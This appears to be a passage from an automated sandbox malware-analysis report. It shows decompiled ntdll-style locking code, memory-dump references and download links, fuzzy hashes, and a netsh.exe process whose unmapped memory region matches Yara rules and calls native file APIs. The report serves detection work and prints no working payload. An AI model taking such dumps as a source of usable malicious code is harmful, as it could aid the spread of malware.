													_push( &_a4);
													_push(_t61);
													_t70 = E008BF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00903915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00903915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00903915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E008E5329(_t110, _t138);
																return E008E53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0090055a
0x0090055d
0x00900563
0x00900566
0x009005d8
0x009005e2
0x009005e5
0x00000000
0x009005e7
0x009005e7
0x009005ea
0x009005f3
0x009005f3
0x00900568
0x00900568
0x00900568
0x00900569
0x00900569
0x00900569
0x0090056b
0x00000000
0x00000000
0x0092217f
0x00922183
0x0092225b
0x0092225f
0x00922189
0x0092218c
0x0092218f
0x00922194
0x00922199
0x0092219d
0x009221a0
0x009221a2
0x009221ce
0x009221ce
0x009221ce
0x009221d0
0x009221d6
0x009221de
0x009221e2
0x009221e8
0x009221e9
0x009221ec
0x009221f1
0x009221f6
0x00000000
0x00000000
0x009221f8
0x009221fb
0x00922206
0x0092220b
0x0092220c
0x00922217
0x00922226
0x0092222b
0x0092222c
0x0092222f
0x00922232
0x00922235
0x00922235
0x0092223a
0x0092223f
0x00922241
0x00922243
0x00922248
0x00922248
0x0092224d
0x0092224f
0x00922262
0x00922263
0x00922268
0x00922269
0x00922269
0x00922269
0x0092226d
0x00000000
0x00000000
0x00922276
0x00922279
0x0092227e
0x00922283
0x00922287
0x0092228a
0x0092228d
0x0092228f
0x009222bc
0x009222bc
0x009222bc
0x009222be
0x009222c4
0x009222cc
0x009222d0
0x009222d6
0x009222d7
0x009222da
0x009222df
0x009222e4
0x00000000
0x00000000
0x009222e6
0x009222e9
0x009222f4
0x009222f9
0x009222fa
0x00922305
0x00922314
0x00922319
0x0092231a
0x0092231d
0x00922320
0x00922323
0x00922323
0x00922328
0x0092232d
0x0092232f
0x00922331
0x00922336
0x00922336
0x0092233b
0x0092233d
0x00922350
0x00922351
0x00922356
0x00922359
0x00922359
0x0092235b
0x0092235d
0x008e5367
0x008e536b
0x008e5372
0x00000000
0x00000000
0x00000000
0x00000000
0x00922363
0x00922363
0x00922369
0x0092236a
0x0092236c
0x00922371
0x00922373
0x00000000
0x00922379
0x00922379
0x0092237a
0x0092237f
0x0092237f
0x00922385
0x00922386
0x00922389
0x0092238e
0x00922390
0x008e5378
0x008e537c
0x00922396
0x00922396
0x00922397
0x0092239c
0x009223a2
0x009223a3
0x009223a6
0x009223ab
0x009223ad
0x00000000
0x009223b3
0x009223b3
0x009223b4
0x009223b9
0x009223ba
0x009223ba
0x009223bc
0x009223bf
0x00000000
0x00000000
0x00919153
0x00919158
0x0091915a
0x0091915e
0x00919160
0x00000000
0x00919166
0x00919166
0x00919171
0x00919176
0x00919176
0x00000000
0x00919160
0x009223c6
0x009223d7
0x009223d7
0x009223ad
0x00922390
0x00922373
0x0092233f
0x0092233f
0x00000000
0x0092233f
0x00922291
0x00922291
0x00922293
0x00922295
0x0092229a
0x009222a1
0x009222a3
0x009222a7
0x009222a9
0x00000000
0x00000000
0x009222ab
0x009222ad
0x009222af
0x00000000
0x00000000
0x00000000
0x009222af
0x009222b1
0x009222b4
0x009222b4
0x009222b6
0x008e53be
0x008e53be
0x008e53be
0x008e53c0
0x00000000
0x00000000
0x008e53cb
0x008e53ce
0x008e53d0
0x008e53d4
0x008e53d6
0x00000000
0x008e53d8
0x008e53e3
0x008e53ea
0x008e53ea
0x00000000
0x008e53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x009222b6
0x00000000
0x0092228f
0x00922349
0x0092234d
0x00922251
0x00922251
0x00000000
0x00922251
0x009221a4
0x009221a4
0x009221a6
0x009221a8
0x009221ac
0x009221b6
0x009221b8
0x009221bc
0x009221be
0x00000000
0x00000000
0x009221c0
0x009221c2
0x009221c4
0x00000000
0x00000000
0x00000000
0x009221c4
0x009221c6
0x009221c6
0x009221c8
0x00000000
0x00000000
0x00000000
0x00000000
0x009221c8
0x009221a2
0x00000000
0x00922183
0x0090057b
0x0090057d
0x00900581
0x00900583
0x00922178
0x00000000
0x00900589
0x0090058f
0x0090058f
0x00900583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00922206

Strings

RTL: Re-Waiting, xrefs: 0092223A, 00922328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0092220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009222FC
RTL: Resource at %p, xrefs: 0092221D, 0092230B

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
Instruction ID: 2029c48b347973a1e417023e4c4ed5587bf3c9de51bb9eb2707bfd12ae49ea21
Opcode Fuzzy Hash: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
Instruction Fuzzy Hash: E25128357042216FEB14CB19DC81FA633ADEBD4720F218229FD55DB38ADA75EC828790

Uniqueness

Uniqueness Score: -1.00%

Function 009014C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9a2088; // 0x77413135
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E008F7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009013CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008C2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009014c0
0x009014cb
0x009014d2
0x009014d6
0x009014da
0x009014de
0x009014e3
0x0090157a
0x0090157a
0x009014f1
0x009014f3
0x0092ea0f
0x00000000
0x0092ea15
0x00000000
0x0092ea15
0x009014f9
0x009014f9
0x009014fe
0x00901504
0x0092ea1a
0x0092ea1f
0x0092ea21
0x0092ea22
0x0092ea27
0x0092ea2a
0x0092ea2a
0x00901515
0x00901517
0x0090156d
0x00901572
0x00901575
0x00901575
0x0090151e
0x0092ea50
0x0092ea55
0x0092ea58
0x0092ea58
0x0090152e
0x00901531
0x00901533
0x00000000
0x00901535
0x00901541
0x00901549
0x00901549
0x00901533
0x009014f3
0x00901559

APIs

___swprintf_l.LIBCMT ref: 0092EA22

Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 0090146B
Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 00901490

___swprintf_l.LIBCMT ref: 0090156D

Strings

51Aw, xrefs: 009014CB
]:%u, xrefs: 0092EA47
%%%u, xrefs: 00901564

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$51Aw$]:%u
API String ID: 48624451-1252038660
Opcode ID: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
Instruction ID: d60bb4c4d903ac62cfddf306c8561288ee324dec9172430db109ee52469ae110
Opcode Fuzzy Hash: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
Instruction Fuzzy Hash: 8D21BF729002299FCB21EE68DC45AEE73BCFB54700F444456F946E7280DB74EA988BE1

Uniqueness

Uniqueness Score: -1.00%

Function 008E53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009222F4

Strings

RTL: Re-Waiting, xrefs: 00922328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009222FC
RTL: Resource at %p, xrefs: 0092230B

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
Instruction ID: 146231664f337d54ada5b514624ca4cd9e6bdcc1f33c7041862d277fd9fddd68
Opcode Fuzzy Hash: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
Instruction Fuzzy Hash: D9513771600715ABEB14DB29DC81FA673ACFF96764F104229FD14DB381EA71EC4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 008EEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 009224FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0092248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009224BD

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
Instruction ID: 7fed8ecd225f7c452b8550a1e146dc44be2ed6bb4e60e0a285cc7c9590204f12
Opcode Fuzzy Hash: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
Instruction Fuzzy Hash: 4F41D570600214BBDB20EFA9DC85FAA77B8FF85720F208619F565DB3D1D634E9418761

Uniqueness

Uniqueness Score: -1.00%

Function 008FFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 008FFD94

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 7839d0770ed58b7be5dc0245013052c5d3921c76c0faf561e5260a59cbb3be55
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 1D914931D0021EEBDF24DFA8C8456FEB7B4FF55314F24847AD651EA2A2E7305A818B91

Uniqueness

Uniqueness Score: -1.00%

Function 008FFE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 008FFED6: ___swprintf_l.LIBCMT ref: 008FFEFD

___swprintf_l.LIBCMT ref: 0092EA87

Strings

51Aw, xrefs: 008FFE57
:%u, xrefs: 0092EA7E

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: 51Aw$:%u
API String ID: 48624451-3890070779
Opcode ID: 0aa1b7b96bc953d56db145267c7a556808a3bd75e7a5c19e944a03e5acd5ec54
Instruction ID: 009a261aac1cd54e8293fc5da3b96c3d7e49ef8b007a819ea247e4ab069afe4a
Opcode Fuzzy Hash: 0aa1b7b96bc953d56db145267c7a556808a3bd75e7a5c19e944a03e5acd5ec54
Instruction Fuzzy Hash: 7711727260022DAB8B10EEB9D8449BBB7ACFF54700B54456AFA45D7152EB30E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: netsh.exe PID: 1428 Parent PID: 1388 netsh.exeCOMMON

Executed Functions

Function 002082AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00203A01,?,?,?,?,00203A01,FFFFFFFF,?,B= ,?,00000000), ref: 002082A5

Strings

M; , xrefs: 002082CC, 002082D4

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: M;
API String ID: 2738559852-2162100337
Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction ID: 3d285b4dc675a7a8381b18ef149883e4ab70dd4cb9c6c423ff4089f23de58d41
Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction Fuzzy Hash: C3110972210204AFCB14DF98CC85EEB77A9EF8C754F158658BA5D97281CA30E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002081B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00203B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00203B87,007A002E,00000000,00000060,00000000,00000000), ref: 002081FD

Strings

.z`, xrefs: 002081ED, 002081F8

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d59eedca4a51e8c31509480ca9681d19bf27a00d02e2a5aa9e26af32d426be47
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 56F0B6B2210208ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 002082E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( = ,?,?,00203D20,00000000,FFFFFFFF), ref: 00208305

Strings

= , xrefs: 002082FC, 00208304

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-2525689732
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 8940c1573d132db88241229275d5d345950327a5eba0b807fa2b48a9913de288
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 78D01275200314ABD710EF98CC45ED7776CEF44750F154555BA585B282C930F91086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00208260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00203A01,?,?,?,?,00203A01,FFFFFFFF,?,B= ,?,00000000), ref: 002082A5

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: e84b272a77b1f9ca2dd2fffab715c1f9848769aa827a11ef4d604967967d2bc9
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 99F0A4B2210208ABCB14DF99DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 020400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020400CF

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 020407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020407B7

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0203FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FAF3

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0203FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FB5B

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0203FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FB73

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
